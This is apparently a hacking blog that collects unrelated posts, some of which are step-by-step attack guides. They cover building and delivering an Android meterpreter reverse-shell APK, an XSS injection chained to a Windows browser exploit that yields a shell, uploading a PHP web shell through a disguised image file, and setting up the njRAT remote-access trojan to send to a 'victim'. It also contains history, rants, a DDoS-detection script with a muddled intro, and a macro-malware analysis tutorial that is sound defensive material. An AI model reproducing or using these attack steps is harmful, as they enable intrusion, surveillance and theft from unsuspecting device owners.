Hack Android Using Metasploit

This was a question asked to me by some people and today by one person.. So here's a short step by step tut for it:

1) Get some Linux os.. It's better for hacking
2) Open Terminal and type:

 msfvenom -p android/meterpreter/reverse_tcp LHOST=186.57.28.44 LPORT=4895 R >/root/FILENAME.apk

• -p => Specify Payload
• LHOST => Your IP* or DDNS
• LPORT => Port You want to listen on
• R => Means RAW Format
• >/root/FILENAME.apk => Location for File

NOTE: You should have port forwarding enabled.. If you don't, talk to your ISP or settings in router menu if you use WiFi...

Now before running that app on your android phone, you have to start a handler. You can do that using –

1. msfconsole
2. use exploit/multi/handler
3. set payload android/meterpreter/reverse_tcp
4. set LHOST 186.57.28.44 *
5. set LPORT 4895
6. exploit

Now Run the app on your android phone and you'll get a meterpreter session opened!!
NOTE – Before installing the app, Please tick "Allow installation from Unknown Sources" from Settings.

FAQ

1) HOW TO HACK ON WAN (NOT ON YOUR OWN WIFI/NETWORK)*
It's really easy and almost the same.
First You Need to get your public IP. You can find that from THIS WEBSITE.
You also need your private ip. Use ifconfig command in terminal to get that.
Now There are just two small changes in the above steps
i) In the msfvenom command, in LHOST, you need to enter your ‘PUBLIC IP'
ii) When creating a listener/handler, in LHOST, you need to enter your ‘PRIVATE IP'
That's IT!!
NOTE – You Need To Port forward The Port you used in your modem/router or it won't work.
2) Apk File made from msfvenom is 0 kb
That means you have some spelling or syntax error. Please recheck the command you entered, if its correct, recheck again!!
3) In Phone – Cannot Parse Package
Try Another File Manager, Download a free one from google store!!
4) In Phone – App Not Installed
You May Need to Sign Your APK file, newer android versions may give error. Refer to this site, and go to last to see steps on manually signing. LINK HERE
5) Kali as Virtual Machine
Virtual Box is known to cause problems, so use VMWare if possible. Also Please DONT USE NAT MODE, USE BRIDGED!!
If There's Any other problem, type in the comment!! I'll try my best to help!!

BYE!

Update & Upgrade Linux

-_-

Here's how you update and upgrade Linux based Operating Systems:

1) Open Terminal
2) Type:

 apt-get update && apt-get upgrade

Done

Bye!

How To Detect a DDoS Attack

Hello guys have you ever done a ddos attack before, well this your lucky article and this is going to show  you how to do just that so get ready to hack. This is a very serious attack and difficult to detect, where it is nearly impossible to guess whether the traffic is coming from a fake host or a real host. If in a DoS attack, traffic is coming from only one source then we can block that particular host. Based on certain assumptions, we can make rules to detect DDoS attacks. If the web server is running only traffic containing port 80, it should be allowed. Now, let’s go through a very simple code to detect a DDoS attack.
The program’s name is DDOS_detect1.py:

import socket

import struct

from datetime import datetime

s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, 8)

dict = {}

file_txt = open(“dos.txt”,’a’)

file_txt.writelines(“**********”)

t1= str(datetime.now())

file_txt.writelines(t1)

file_txt.writelines(“**********”)

file_txt.writelines(“\n”)

print “Detection Start …….”

D_val =10

D_val1 = D_val+10

while True:

pkt = s.recvfrom(2048)

ipheader = pkt[0][14:34]

ip_hdr = struct.unpack(“!8sB3s4s4s”,ipheader)

IP = socket.inet_ntoa(ip_hdr[3])

print “Source IP”, IP

if dict.has_key(IP):

dict[IP]=dict[IP]+1

print dict[IP]

if(dict[IP]>D_val) and (dict[IP]<D_val1) :

line = “DDOS Detected “

file_txt.writelines(line)

file_txt.writelines(IP)

file_txt.writelines(“\n”)

else:

dict[IP]=1 

we used a sniffer to get the packet’s source IP address. The file_txt = open(“dos.txt”,’a’) statement opens a file in append mode, and this dos. txt file is used as a logfile to detect the DDoS attack. Whenever the program runs, the file_txt.writelines(t1) statement writes the current time. The D_val =10 variable is an assumption just for the demonstration of the program. The assumption is made by viewing the statistics of hits from a particular IP. Consider a case of a tutorial website. The hits from the college and school’s IP would be more. If a huge number of requests come in from a new IP, then it might be a case of DoS. If the count of the incoming packets from one IP exceeds the D_val variable, then the IP is considered to be responsible for a DDoS attack. The D_val1 variable will be used later in the code to avoid redundancy. I hope you are familiar with the code before the if dict.has_key(IP): statement. This statement will check whether the key (IP address) exists in the dictionary or not. If the key exists in dict, then the dict[IP]=dict[IP]+1 statement increases the dict[IP] value by 1, which means that dict[IP] contains a count of packets that come from a particular IP.

The if(dict[IP]>D_val) and (dict[IP]<D_val1) : statements are the criteria to detect and write results in the dos.txt file; if(dict[IP]>D_val) detects whether the incoming packet’s count exceeds the D_val value or not. If it exceeds it, the subsequent statements will write the IP in dos.txt after getting new packets. To avoid redundancy, the (dict[IP]<D_val1) statement has been used. The upcoming statements will write the results in the dos.txt file. Run the program on a server and run mimp.py on the attacker’s machine.so there you have it guys and trust me by looking at this it is very simple to implement.

BYE!

The Future of Technology

The Future of Cyber Security and Technology

A year back I used to wonder why fans don't have any remote to control it and now there are fans with remote control and also a led light attached at the bottom. This may seen as a normal part of technological advancements but as we see this change always occurring, we also see a bunch of problems coming along with them. This is going to be a relatively long blog post and the completion may take some time, but after reading this you all will realize how important security is and how important it is to test the products for security loopholes before commercializing anything. Also how important updating the product can be and to contradict it, why you should keep some legacy products. So sit back and read this post. Enjoy!

Some basic facts

1) Technological advancements never stop and it's we who call for it always. Let's see a small situation: Many people protested about streets not being clean and that there was garbage dumped anywhere in Indian streets. The new government won the election and started a clean India campaign. Many people participated including the celebrities and other renowned persons. This not only bought a change in the society as a whole but also may influence other countries to cope up with the India in the case of cleanliness. I never admit that it has solved the problem completely and it may never do so. Cleanliness in India is like asking to remove poverty in the world. It never completely goes away. 

So now the government also launched a smartphone application for clean India. This application like any other BJP application focuses more on the face of Prime Minister rather can providing useful functions. But we can't deny that atleast we have an application from the governments side...That too an Android application. 

The point I wanted to make here was that this too is an example of technological advancement that will keep  happening and will never stop. It may take time, or delay a bit, but will and can never stop because we cannot live in isolation of what the world is doing.

2) Cyber Threats will never stop as well.. Some may seen freaked out by this statement but it's the universal truth now. As new technology comes in, new threats emerge and new precautions get formed. This is an ongoing cycle and there is nothing in the world that cannot be exploited. Nothing!

3) Internet is not hidden, it's open and ever increasing. Keep repeating the mantra: "what goes online, stays there forever" and you can be safe from many online threats. Stay to your roots because internet is not your home, it's just another means to entertain humans that humans made for themselves.

Harsh Truth

The harsh truth based on simple fact #2 is that every electronic gadget can be exploited and hacked.. This is not unknown that ATM machines can be hacked. Now many people say that ATM's have a small system that's why we can hack them, but the truth is that even if there was not a system in it and it was like a radio controlled money providing machine(though this idea makes no sense to even imagine), it would be hacked in some ways to spew out the money. When we can control a cockroach, we can do anything..

So here are some question found on Google which I will try to correctly answer:

#1. Can cars be hacked?

Ans. Yes. We can hack the dashboard, the music player(because it's a different entity, the controls(in-case of automatic cars) and now also the car opening automatic keys. There is research going on in various car manufacturing companies on how to solve this problem and how to make the cars more secure.

#2. Can we make artificial intelligence like 'Iron Man's Jarvis'?

Ans. Yes we can.. When you talk about artificial intelligence like Jarvis, it's possible and already made! Apple has pretty good voice assistance named "Siri" in it. Though many may say that it takes it's answers from internet and cannot be called an artificial intelligence, but these people should ask the makers of  "Iron Man" that why didn't they clarify that Jarvis could or could not take information from the internet? 

The only thing I can say is that if we want most of our questions answered without an internet, we need to have a whole football ground to keep our own computers at and then run a small mobile application to search offline. Is that what Jarvis means to these dumb people?.. Owning a football field and Google's servers?

#3 Can animals be hacked?

Ans. Haha, Yes. We can remote control a cockroach now any also other animals like mice. Now the time is near when we can have our own "living" mice to play with. 

Near future will bring inventions like controlling all the rodents with WiFi signal and playing with them, making them do weird stunts..

#4 Rise of digital warfare? Is it truth?

Ans. It was, it is, it will remain. Digital warfare was there from the time computers came in. It's the question of how do we define a war? Is war defined in terms of countries vs countries OR Blackhat's vs Countries?

I think that even the hackers, the useless script kiddies that conduct a ddos or boot attack on victims are the part of digital warfare. As for the hackers those who deface websites and other stuff to convey messages like "free some bullshit country" are part of a warfare.. And as for me, many of such ill minded people have a lot of support.

#5 Is Anonymous really harmful? What's their future?

Ans. Idk why this question comes up in my email? really... still stuck on Anonymous? There are a lot more, better organized groups that work towards conveying a message. Anonymous "was" notorious back in the days, but now it's a bunch of small hackers and street people trying to protest every second day. Do they bring a change? Yes, they do bring a change.. Give the credits to the old hackers who made the group notorious. As such, no one including the law enforcement care about the group. Yes, they do keep in touch with activities that go on in there just to make sure no one really does the harm, but we all know they concentrate more on "Million mask march" than hacking..

The future is predictable and as per my good prediction, they will slowly diminish but after a long time unless they do something really big. I mean apart from Million Mask.. Like if they hack some FBI or disclose some big enough secret to rock the world or even the USA as such.. Otherwise, they'll just be live other activist groups protesting on streets(just wearing a mask)...

With that being said, I also answered some question emailed to me.. You can also ask question on fb for direct answers.

Bye!

The History Of Hacking & Phreaking

DISCLAIMER: This file was originally written by: Raven of BOMB Squad 

 

              /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
              \      A BOM SQUAD RELEASE       /
              /        The History Of          \
              \     Hacking & Phreaking        /
               \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/

                           By Raven

                         -=-=-=-=-=-

Okay boys and girls, children of all ages...Here's a
revolutionary idear....The announcements foist!

                         -=-=-=-=-=-

     The file we released on smashing up cop cars and getting
away, ya know?  Well, don't try it unless you got half a ton
of cocaine in the back seat, and a billion bucks on the dash!
The cops are wise, and are liable to open fire on you once
you start pulling backwards, so, don't attempt it unless you
have no other options.  Another thing - now they're air bags
are quicker-draining, so they can start the chase almost as
soon as you are off.

                         þ-þ-þ-þ-þ-þ

      The Garden Of Souls ú ???-ANA-RCHY ú BOM Squad WHQ
      Graveyard Shift ú COM-ING-SOON ú Courier/Public HQ
             êrete ú 201-984-1738 ú 201 Dist Site
      Criminal's Sanctum ú 908-888-4613 ú 908 Dist Site

               -> And Now, On With The Show! <-

Okay, folks...First of all, I wrote this because, well, a lot
of you fellow hacker/phreakers out there do all yer
stuff, but don't know your roots.  Hacking and phreaking have
been around for over 20 years now.  So,
without further adue, I present, the History Of Hacking,
and Phreaking!


             
         -=- The History Of Hacking & Phreaking -=-

     Believe it or not, but hacking and phreaking have been
around since the '60s.  Yep.  Hacking is a legacy!  Phreaking
came around some time about 10 years later.


                      -The 60's Hacker-

     These were back in the days when a teenager couldn't
even buy a computer (because of price), much less fit it in
his house.  The 'hackers' were the people the sysop's of
lamer PD boards would have you believe - people who spent
lots of time with their computer (hacking away at the
keyboard).
     The true hackers came about when Massachusetts Institute
of Technology employed some nerds to do some artificial
intelligence and computer work for them.  These guys actually
created the models for the terminal your working on right
now.  They were the true and original programmers and
engineers.
     Anyhow, these guys were working on a project called MAC
(Multiple-Access Computer, Machine-Aided Cognition, or Man
Against Computers...Take yer pick).  All goes well as these
guys write some basic programs, build operation systems, and
play 4 color chess games, until the MAC programmers go public
with a computer time sharing program.  The first BBS, and it
even had over 100 nodes!
     Of course, only other guys with main frames could access
this thing (i.e. - the government, other big schools, and big
companies).  These sysops who worked at MIT did their best to
control the badly maintained MAC system, but the hoards of
users cluttered up everything.
     Then, something magical happened.  A man called John
McCarthy, Ph.D., crashed the MAC system.  Soon, others took
sport in crashing this international network.  Companies were
able to take place in a crude form of industrial espionage on
the MAC buy 'eavesdropping' on rival's E-Mail, and those
cheap cardboard punch cards (the first computer disks) were
always being corrupted by batch-file viruses.  Hacking is
born.
     However, crashing the system and all other 'evil'
activities were encouraged.  From them, sysops learned from
mistakes, and the hackers took place in the hackers'
obsession - the desire to learn as much as possible about a
system.


                  -The 70's Hacker/Phreaker-

     The 70's were a magical decade, and a flying leap for
phone fraud.  The first half of the 70's was like the 60's in
respect to hacking.  In the second half, hacking escalated
into 80's hacking (see below).
     Besides hacking, though, the 70's produced the phone
phreaks.  Phreaking was born from the non-existent womb of a
blind child from Tennessee named Joe Engressia.  Joe was one
of the rare people born with perfect pitch.  Because of that
gift, Joe was able to manipulate some of the most
sophisticated and widespread technology in the world.
     Joe enjoyed the phone system.  Being a curious 8 year
old, he called recorded messages all over the world, because
it was free, and is was a good past time.  One day, he was
listening to a message and whistling.  When he hit a certain
tone, the message clicked off.  You or I might have hung up,
but curious 8 year olds don't.
     Joe fooled around with other numbers and the same pitch,
and found he could switch off any recorded message.  Joe
called his local phone company, and wanted to know why this
happened.  He didn't understand the explanation given, but he
did realize that he had stumbled on to a whole new world to
explore.
     How was Joe able to do this?  Joe had stumbled onto the
multifrequency system (known as MF to phreakers world wide).
The  purpose of this system was to do most of the the job a
human could do, but done cheaper and quicker by a machine.
     Joe used this system by whistling the right pitches at
the right times to get free calls.  Of course, he never
wanted to hurt the phone company.  He loved the phone
company.  It was merely curiosity which caused him to do this
all.
     Joe phreaked all the way into college (he was in college
around the early 70's).  While phreaking free calls back home
for some friends, he was caught.  Joe's case was a world wide
publicity case (beginning first with an article in Esquire in
1971).  Soon, he received calls from phreaks world wide
asking advice on certain pitches.  Joe Engressia had become
the phounding phather of phreaks.
     Several years before, in 1954, the phone company made a
large mistake.  They printed all the MF codes in their
Technical Journal, a book which was easily obtained then, but
has not been released to the public in over 15 years because
of the damage phreaks could do with it.  Phreaks learned the
MF, and began using everything from their mouths to pipe
organs to phreak calls.
     Then, the most ironic thing of all aided phreakers.
John Draper, an air force technician stationed over seas
discovered that if a toy whistle in boxes of Cap'n Crunch had
a hole covered up, it produced a pure 2600 cycle tone, the
exact pitch needed for a free call anywhere (at least it used
to be).  Soon, Draper was calling other phreaks all over the
world.  Paris, Peking, London, New York and more.
     Using his 2600 cycle whistle and other tools of the
trade, Draper set up a phreak underground.  It was a mass
node 'party-line' in which many phreaks talked to one another
at one time.  In the throne was Cap'n Crunch - John Draper's
handle.
     The phreakers exchanged knowledge, and soon combined
their ideas to build the blue box.  The blue box can reproduce
any MF pitch.  The whole thing came together in October,
1971, in Esquire magazine.  Ron Rosenbaum exposed the
phreaking world from Joe to Crunch in one article called
"Secrets Of The Little Blue Box".
     Rosenbaum distorted the phreaking world greatly.
According to him, Crunch had a van which was chock-full of
electronics.  Crunch would drive around the country side,
going from pay phone to pay phone, stealing cash from the
coin box for money, and placing calls to phreaker friends.
Occasionally, Crunch would call his 'mentor', Joe, for
advice.  Nah.  I don't think so.  Rosenbaum glorified the
phreaking world, making Crunch a romantic hero.
     Draper/Crunch was arrested, convicted, and did time.
While in the big house, several mafia inmates tried to
recruit him into a commercial blue-box front.  Draper
declined, and they knocked out a few of his teeth, and broke
his back.
     After leaving prison, Draper quit phreaking, and began
programming.  Last the world heard, he was head of a
programming division of Apple.


                      -The 80's Hacker-

     During the 1980's the hacker population probably went up
1000-fold.  Why?  For several reasons.  The first being that
the personal computer and clones were made available to the
public at cheap prices.  People could afford to buy a
terminal and set up a BBS.  And, where you find BBS's, you
find hackers.
     The second, and probably biggest reason was the movie
WarGames.  WarGames displayed hacking as a glamourous
profession.  It made hacking sound easy.  I once heard that
the estimate of hackers in the US increased by 600% after
WarGames.  Modem users also increased, but only by a mere
1200%.  This made hacking easy, though, because it was also
estimated that one third of "WarGames Generation Hackers" had
the password 'Joshua'.  If you have seen the movie, you know
that that name had some significance.  Many hackers didn't
like WarGames, though.  They thought it made hacking sound
like a pansy thing to do.  To non-hackers, though, WarGames
was great.
     The third reason is because of the mass publicity
surround WarGames and hacking.  If we had a controlled media,
probably the only hackers in the USA would be spies and
corporate computer techs.  The media increased the hacker
population by a lot, also.


             -The Hacker of The 90's and Beyond-

     Hacking of the 90's have basically been crashers of
BBS's and company boards.  There have been a few virus-smiths
around.  Piracy is always around.  Who knows what the future
brings in the world of hacking, phreaking, and anarchy? 

 

 BYE

SORRY TO ANONS

So this is my apology note to Anonymous!

So earlier this day I wrote an article stating it to be a fake group and full of show-offs. I still hold my position on it and still say that there are many fake people in it only for fame, but some are not.  This is an apology for those who feel my last blog post hurt them and those who have been working to change the world. I myself was am there for helping others and also asking for help because I'm not perfect and cannot beat the cyber crime world without help.

I don't know about others, but I joined Anons because I needed help and also knew that if I ever asked, I would get it. It's my mistake that I never asked for any help and expected too which was not justified by me.

Why Am I Apologizing?
So today the same time after writing my 1st post, I asked Anons help in taking out a small website which I had reported and had no idea how to take down.. So as not expected by me, the website was taken down due to direct reporting to the hosting company.
I'm happy to see that the group still holds the value and ready to help even after criticism.

And to the fake people who just post news and shit in the group: I still hate you and feel you all are attention grabbers..

Bye!

Anonymous: A BIG Joke

The only thing I like about anonymous is their mask. Nothing else makes them anonymous. You see over Facebook and other social-media websites flooding with "Anonymous" groups and wonder, "Are they really anonymous over here?".. Those who clain to hack for Anonymous are big jokers and let me tell you the holy truth:

I don't get why anonymous gets talked about so much, in a serious way. When I first heard about them, I thought they were awesome. It got me excited that there could be this group of people on the internet who were very computer savvy and revolutionary, and could make a difference. Since observing their activities over a time, though, that completely faded. At this point they're pretty much a joke. I don't understand why people talk about them so seriously. Literally all they do is take down websites for a few hours. Or lock people out of their social media accounts. Like...really? How does that impact anything whatsoever? Its just like an annoyance that the people have to deal with for a couple of hours. It makes no difference. It seemed to me, and still does, that if you truly have great hacking capabilities, you could probably actually do some stuff that could make a difference. Release information, alter things, or something. But they just shut websites down for a few hours. They do nothing of any significance. It's kind of a joke. 

The only reason hackers go with stupid people like those who claim to be so called "Anonymous" is because of fame. And believe me, it's all about fame and nothing else. There is no such brother or sisterhood in Anonymous. Everyone is on their own and it's a big joke because of various practical reasons:

1) It's not a group, it's an idea and I like it.. But who's there to give it a direction??
2) I cannot trust anyone cause even the feds can see all the activities we do there
3) People can dox you if they're not in good terms with you
4) Do they really help? The only help I've got till date is the sharing and liking of my posts...
5) Are all of em' hackers? HELL TO THE NO! Most are jokers and homeless people wanting to find "justice" in the capitalist society which I can sadly but surely tell they won't ever get.

Now how much more crappy can this be?
So I reported about a dozen and more terrorist affiliated and directly linked profiles on Facebook, Twitter and other. I also exposed some IP Addresses linked to ISIS on the DeepWeb including the Tor network and I2P. But did anyone care helping except from saying "good". NO! I can't blame them cause they're just there for fame and don't give any shit about the basic idea of fighting the wrong. They just come and write shit loads of posts and share blogs like mine to show off that they help, but liek my previous blog posts I would again like to say, noone gives a shit about the daily news posts about what we already see everyday on Google. YOU ARE NOT SHARING AND CARING BUT ANNOYING EVERYONE.
The only people I say work and do a great job have become my friends but still many are noobs. Atleast they learn and do it. But atlast the truth remains the same, "Anonymous is an idea, and very few people are real, rest all are attention grabbers."

Bye! 
And YES, Take this offense seriously.

XSSF in Metasploit

The XSSF (Cross Site Scripting Framework), which is used to analyse the XSS flaws in site. So here is the practical:
Write this script in the browser with the xss vuln. link:

  Quote

"><script src="http://192.168.1.10:8888/loop?interval=2"></script>

Working in Metasploit:
msf>load XSSF
Cross-Site Scripting Framework

                                       Ludovic Courgnaud - CONIX Security

[+] Server started : http://192.168.0.58:8888/

[*] Please, inject 'http://192.168.0.58:8888/loop' resource in an XSS

[*] Successfully loaded plugin: XSSF
msf>xssf_victims
Victims

=======
id  xssf_server_id  active  ip  interval  browser_name  browser_version  cookie
--  --------------  ------  --  --------  ------------  ---------------  ------
[*] Use xssf_information [VictimID] to see more information about a victim
msf>xssf_information 1

 

  Quote

msf>use auxiliary/xssf/alert

msf  auxiliary(alert) > set AlertMessage This is XSS Attack by Kislay

AlertMessage => This is XSS Attack by Kislay

msf  auxiliary(alert) >use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

msf  exploit(ms10_046_shortcut_icon_dllloader) >set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf  exploit(ms10_046_shortcut_icon_dllloader) >set LHOST 192.168.1.10

LHOST => 192.168.1.10

msf  exploit(ms10_046_shortcut_icon_dllloader) > exploit

msf>jobs

msf>xssf_exploit 1 0

msf>sessions

msf>session -i 1

meterpreter>

 
And you get the shell 

Analysing Malware

     Analyzing Malware By Example: Part 1

In this tutorial you will learn how to perform basic static analysis on a malicious sample. Please make sure to prepare a safe analysis environment on your machine before you start.

I strongly encourage you actually do the things that are explained here on your analysis environment. Merely reading the tutorial is not enough.

Our Sample:

Download the zip file with sample here: sample.zip

The password is "infected".

File Type Analysis

You have sample now that you want to analyse, but you don't know what kind of file it is. The file type or the format it is made of is the most important thing to start with. Once you know the file format you are able to decide which tools are suitable for analysis.

If you are only used to a Windows environment, you may be skeptic about the usefulness of file type analysis. Afterall the file extension of a file will show in most cases the correct type, e.g., .exe for executable programs, .doc for Microsoft Word files etc.
But it is not that easy.

• The file extension can be spoofed
• With the right command you can execute any file regardless of the file extension.
• Temporary files often have the file extension .tmp regardless of their file type.
• Therefore, malware often has the wrong file extension.
• Depending were you get the samples, they will likely not have any file extension. Samples shared by researches often just have the hash as their filename.
• You should be able to detect the type of embedded files.

So how do you get to know the file type of a sample?
File types are determined by file signatures, which are usually at the very beginning of the file. A signature is a specific sequence of bytes that was defined by the file format specification so the correct file type can be verified by applications that parse these files.
A large list of file type signatures is at http://www.garykessler.net/library/file_sigs.html

Most malware analysts know the file type signature or other typical strings of most common file types by rote, because they see them every day. So they often just open the file in a hex editor and can tell what is inside.

However, if you don't know how certain files typically look like, you might also run a file type parser or scanner. Linux has in inbuilt file type parser, which is:

Code

file <sample>

On both Linux and Windows you can use TdID, which has over 6000 file type definitions. Download TdID now and try it with our sample.

Tip for command prompt usage on Windows: Navigate to the trid_w32 folder, hold Shift, then rightclick on the folder and click open command window here (see also link).
A command prompt will open in the folder where you had the focus on. Type
trid.exe, then drag the sample into the command prompt and press Enter.

(Note: I take as a given that you can navigate your command prompt if you use Linux.)

If you get a message that says "No definitions available!" you need to download a the newest definition database from here (scroll down to the Download section and choose TrIDDefs.TRD package). Unpack the ZIP file and put the triddefs.trd into the same folder as trid.exe. Apply trid.exe on our sample and you should get an output like this:

Code

TrID/32 - File Identifier v2.20 - (C) 2003-15 By M.Pontello
Definitions found:  6108
Analyzing...

Collecting data from file: 048714ed23c86a32f085cc0a4759875219bdcb0eb61dabb2ba03de09311a1827
 45.7% (.DOC) Microsoft Word document (32000/1/3)
 42.8% (.XLS) Microsoft Excel sheet (30000/1/2)
 11.4% (.) Generic OLE2 / Multistream Compound File (8000/1)

That means our sample is most likely a Word or Excel document.
If you used the Linux file command on the sample, you will get an even more detailed output, because it is able to parse a lot of file types.

Now that we have an idea, let's use a hex editor. It can be any of your choice.
Scroll a bit through the file and see if you recognise any strings.
At some point you might see this:



This tells you that our sample is a Microsoft Word document.

Another possibily of research: Check if the file is listed on Virustotal. For that you may get the file hash. Linux has again an inbuilt command called sha256sum to calculate a hash value. For Windows you may use a program like HashCheck.

Virustotal does not only list detections, it also shows lots of additional information about the file, depending on the filetype.
You can of course upload the file, but often there are reasons not to do so. The file might contain private information that shouldn't be available on the web. You must be aware that every file you upload on Virustotal is available for everyone who pays for file access.

Looking at the Code

Our sample is a Microsoft Office document, most likely a Word document. There are great tools out there to analyse these documents.

Download OfficeMalScanner and extract the ZIP file and execute the OfficeMalScanner.exe via command line. You will see usage information.

Code

+------------------------------------------+
|           OfficeMalScanner v0.61         |
|  Frank Boldewin / www.reconstructer.org  |
+------------------------------------------+

Usage:
------
OfficeMalScanner <PPT, DOC or XLS file> <scan | info> <brute> <debug>

Options:
  scan    - scan for several shellcode heuristics and encrypted PE-Files
  info    - dumps OLE structures, offsets+length and saves found VB-Macro code
  inflate - decompresses Ms Office 2007 documents, e.g. docx, into a temp dir
Switches: (only enabled if option "scan" was selected)
  brute - enables the "brute force mode" to find encrypted stuff
  debug - prints out disassembly resp hexoutput if a heuristic was found

Examples:
  OfficeMalScanner evil.ppt scan brute debug
  OfficeMalScanner evil.ppt scan
  OfficeMalScanner evil.ppt info

Malicious index rating:
  Executables: 20
  Code       : 10
  STRINGS    :  2
  OLE        :  1

----------------------------------------------------------------------------
    I strongly suggest you to scan malicious files in a safe environment
 like VMWARE, as this tool is written in C and might have exploitable bugs!
----------------------------------------------------------------------------

Apply the scan mode with the following command:

Code

OfficeMalScanner.exe <samplename> scan

It will verify that this is a Word document:

Code

[*] Ms Office OLE2 Compound Format document detected
[*] Format type Winword

And it will tell you that it found no malicious traces, but this is an automated analysis. Always check the file yourself. Run the info mode to extract any Macro code from the file.

Code

OfficeMalScanner.exe <samplename> info

The program tells you that it found VB-Macro Code in the file and where the Macro code is saved to. Navigate to that location.
I strongly recommend that you use Notepad++ to open the extracted VB code. In the Menue choose Language --> V --> VB to get proper syntax highlighting.

You will see a lot of code that does not look useful. Adding clutter is a common way of obfuscation.
Press Ctrl + F to open the search window and search for the string "environ". A description of the function is here: https://msdn.microsoft.com/en-us/library/office/gg264486.aspx

Quote

Returns the String associated with an operating system environment variable.

A lot of malware authors use this function to determine the location of the Temp folder.
Other typical functions you might search for in unknown Macro scripts are:

Code

Shell
StrReverse
Chr
Put
Write
.exe
Open
ResponseBody
Binary

These will lead you to the relevant code parts if you have a lot of clutter in the code.

In this part of the code you can see some interesting hex strings. To get the meaning of these hex strings open a terminal and the python interpreter (or use another language you are more comfortable with).

Code

unknown = "568756E2E69626F237A6F2D6F636E24756E6F686361666F2F2A307474786"

We save one of the strings in a variable.
The VBA macro reverses the string, so we do the same:

Code

reversed = unknown[::-1]

The last step is to transform this hex representation into a readable string.

Code

reversed.decode("hex")

The result will show you a download path for an executable. Warning: Even if it is tempting, you must not visit a website found in malicious files! But you may do some additional research with whois.

The other strings can be obtained the same way:

Code

"05D45445"[::-1].decode("hex")

You will get the following strings

Code

hxxp://fachonet.com/js/bin.exe
\\YEWZMJFAHIB.exe
TEMP

Search for some of the other keywords that I told you and explore the code. You will find the code that writes the file to disk and the part that runs it.

Obviously this document downloads a file from hxxp :// fachonet . com/js / bin . exe, saves it as YEWZMJFAHIB.exe into the TEMP directory and runs it. This kind of malware is called macro downloader.

That was the first malware analysis tutorial. Macro malware seemed dead for while, but a new wave of it popped up. Office malware samples are usually droppers or downloaders that are spread via email. That makes them the initial carriers of infections. 


I hope you all understood it..
Bye!

Upload Shell Using Tamper Data

While hacking u must have come along some sites or pages where they ask you to upload shells in just .jpg or some image format and i dont think you must be having any image shell :p . Anyways lets begin. You must have heard of data tampering or Tamper Data? No? Well, i will tell you...

 Tamper Data is a firefox addon which is used to view and modify HTTP/HTTPS headers and post parameters.Trace and time http response/requests.Security test web applications by modifying POST parameters.

First of all- download tamper data from here:  https://addons.mozilla.org/en-us/firefox/addon/tamper-data/ (remember to use Firefox)-

Install it and restart firefox. (It works with almost all the versions of firefox).-

Rename your .php shell to .jpg shell. e.g. : if the name of your shell is shell.php, make it shel.php.jpg or shell.php;.jpg shell.php;.jpg (To bypass website's security).

- find website to upload images

1- Locate your shell and place it in the upload box.

2-Click on tools in firefox menu and select Tamper Data.

3- Wait...Dont click on upload/save button , instead click on Start Tamper in tamper data addon and remember dont open any extra tabs except the uploading page.

4- Now hit the upload button.

5- After clicking on upload a window will appear, click on Tamper button.

6- Then you will see a tamper popup, copy all of the text of POST_DATA in a notepad. press ctrl+f in notepad and find shell.php.jpg or shell.php;.jpg and delete .jpg :) shell.php

7- Now again copy all the things in notepad and paste it in  POST_DATA field and click ok 

8- Locate ur pic/shell, What? You are done. your shell will be uploaded in the .php format..

 

 

Bye!

NjRAT setup and Usage

Njrat Setup & Usage

Original tutorial on: http://www.hack-anything.com

I posted this for my friend here :) Hope this helps you..

Features :-

• Process Injections
• Hooks
• USB Spreader feature 
• Little Stub Size 100kb <
• Easy To Crypt the files 
• Stubsrc.rar is the source code of the stub if you're a decent applied scientist you'll be able to add practicality ... 

Note:Don't delete file (stub.exe) and additionally do not execute it it is necessary to make a replacement bin .


Note:- This tutorial only for education purpose please do not damage any person, Hack-anything.com are not responsible for any damage or action on you,This is illegal use of RAT. Please follow cyber law of your nation.

  How to Setup :-

• Make no ip account here :- Click here
• Now login no ip account and go in Host/redirects > Add host > 
• Choose name of your no ip url Example :- xyz.zapto.com

• Add Host and Download no ip client
• Install no ip client and run client
• Click on edit and put your no ip login details and Click Ok

• Now click edit host And tick/select url you created in account and click Save

• Now you almost done no-ip setting here

Lets start rat setting

• Run njrat.exe and click Builder

 

• Put details as same as photo
• Just change host url with your url and Build own rat virus file

You are done everything now.

Send your server.exe file to friend or victim and when victim run your .exe he/she automatically connected to your RAT server.

Open Websites Using CMD

Opening Websites Using CMD

It's easy and simple. You could use this method in making some noob virus by making a batch script to do the stuff.

PROCEDURE 1

1.) Goto Start -> All Programs -> Accessories ->command prompt. Right click and choose run as administrator.

2.) Type: start www.google.com and hit enter.

3.) Website will open in your default browser.

PROCEDURE 2

1.) Goto Start -> All Programs -> Accessories ->command prompt. Right click and choose run as administrator.

2.) Type: rundll32 url.dll,FileProtocolHandler www.google.com and hit enter.

3.) Website will open in your default browser.

 

BYE!

Exploit Kit Analysis Via Wireshark & CapTipper

Alright so I figured I might as well post a little tutorial on what I have been working on for the past couple of weeks. I have been doing analysis on some traffic captures of exploit kit attacks primarily to look at the grit of how they work and how their load distribution servers work (might do a paper or something on this sometime it is actually more interesting then it might seem at first glance). Anyways enough foreplay, on to the tutorial.
 
Setup:
First you will need a couple of tools to follow along. I use these but I am sure there are other ways out there, use what your are comfortable with.

• CapTipper: https://github.com/omriher/CapTipper
• WireShark: https://www.wireshark.org/
• JPEXS:  https://www.free-decompiler.com/flash/

 
Note: JPEXS is only necessary if you want to decompile the swf of the flash exploits to mess around with them.
 
I also highly recommend setting up wireshark this way for easier analysis of web traffic: http://www.malware-traffic-analysis.net/tutorials/wireshark/index.html
 
We will be analyzing this file: http://www.malware-traffic-analysis.net/2014/12/04/2014-12-04-traffic-analysis-exercise.pcap
 
Basic Identification:
The first step in analysis is to determine some basic information such as the ip of the compromised host and the exploit kits landing page. So lets open the pcap up in both wireshark and CapTipper to open it in CapTipper use the command: python CapTipper.py -s <name of pcap file>. The -s is just because we do not want to use the web server feature since it would be somewhat dangerous considering it would be practically be like mirroring an exploit kit onto a server. I recommend making CapTIpper.py executable and soft linking it to your bin folder for ease of use. Once you have it open in CapTipper it should show you a list of conversations:
 

 
 
